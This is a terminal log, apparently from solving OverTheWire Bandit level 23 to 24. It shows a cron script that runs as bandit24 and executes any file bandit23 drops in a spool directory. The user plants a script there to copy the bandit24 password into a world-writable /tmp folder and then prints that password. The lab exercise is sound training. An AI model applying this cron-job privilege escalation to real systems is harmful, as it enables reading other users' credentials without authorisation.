gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8 for bandit24

bandit23@bandit:~$ cd /etc/cron.d/
bandit23@bandit:/etc/cron.d$ ls -la
total 44
drwxr-xr-x   2 root root  4096 Jun 20 04:08 .
drwxr-xr-x 121 root root 12288 Jun 20 21:05 ..
-rw-r--r--   1 root root   120 Jun 20 04:07 cronjob_bandit22
-rw-r--r--   1 root root   122 Jun 20 04:07 cronjob_bandit23
-rw-r--r--   1 root root   120 Jun 20 04:07 cronjob_bandit24
-rw-r--r--   1 root root   201 Apr  8 14:38 e2scrub_all
-rwx------   1 root root    52 Jun 20 04:08 otw-tmp-dir
-rw-r--r--   1 root root   102 Mar 31 00:06 .placeholder
-rw-r--r--   1 root root   396 Jan  9 20:31 sysstat
bandit23@bandit:/etc/cron.d$ cat cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname/foo
echo "Executing and deleting all scripts in /var/spool/$myname/foo:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        fi
        rm -f ./$i
    fi
done

bandit23@bandit:/etc/cron.d$ cd /var/spool/bandit24/foo
bandit23@bandit:/var/spool/bandit24/foo$ cd /tmp
bandit23@bandit:/tmp$ mkdir tmp.nish
bandit23@bandit:/tmp$ chmod 777 tmp.nish
bandit23@bandit:/tmp$ cd /var/spool/bandit24/foo
bandit23@bandit:/var/spool/bandit24/foo$ vi pass.sh
bandit23@bandit:/var/spool/bandit24/foo$ chmod 777 pass.sh
bandit23@bandit:/var/spool/bandit24/foo$ ls /tmp/tmp.nish
pass_received
bandit23@bandit:/var/spool/bandit24/foo$ cat pass_received
cat: pass_received: No such file or directory
bandit23@bandit:/var/spool/bandit24/foo$ ls /tmp/tmp.nish
pass_received
bandit23@bandit:/var/spool/bandit24/foo$ ls /tmp/tmp.nish
pass_received
bandit23@bandit:/var/spool/bandit24/foo$ cd /tmp/tmp.nish
bandit23@bandit:/tmp/tmp.nish$ ls
pass_received
bandit23@bandit:/tmp/tmp.nish$ cat pass_received 
gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8
bandit23@bandit:/tmp/tmp.nish$
